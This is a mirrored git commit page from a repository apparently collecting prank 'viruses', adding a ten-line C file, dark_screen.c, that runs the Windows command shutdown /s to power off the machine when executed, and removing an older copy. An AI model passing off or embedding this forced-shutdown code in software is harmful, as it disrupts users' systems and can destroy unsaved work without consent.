mirror of
https://github.com/MinhasKamal/CuteVirusCollection.git
synced 2025-12-12 15:50:04 -08:00
dark screen
This commit is contained in:
10
dark_screen.c
Normal file
10
dark_screen.c
Normal file
@@ -0,0 +1,10 @@
|
||||
/**
|
||||
* Developer: Minhas Kamal
|
||||
* Functionality: Simply shuts down the system.
|
||||
**/
|
||||
|
||||
#include <stdlib.h>
|
||||
|
||||
main(){
|
||||
system("C:\\WINDOWS\\System32\\shutdown /s");
|
||||
}
|
||||
@@ -1,5 +0,0 @@
|
||||
#include <stdlib.h>
|
||||
|
||||
main(){
|
||||
system("C:\\WINDOWS\\System32\\shutdown /s");
|
||||
}
|
||||
Reference in New Issue
Block a user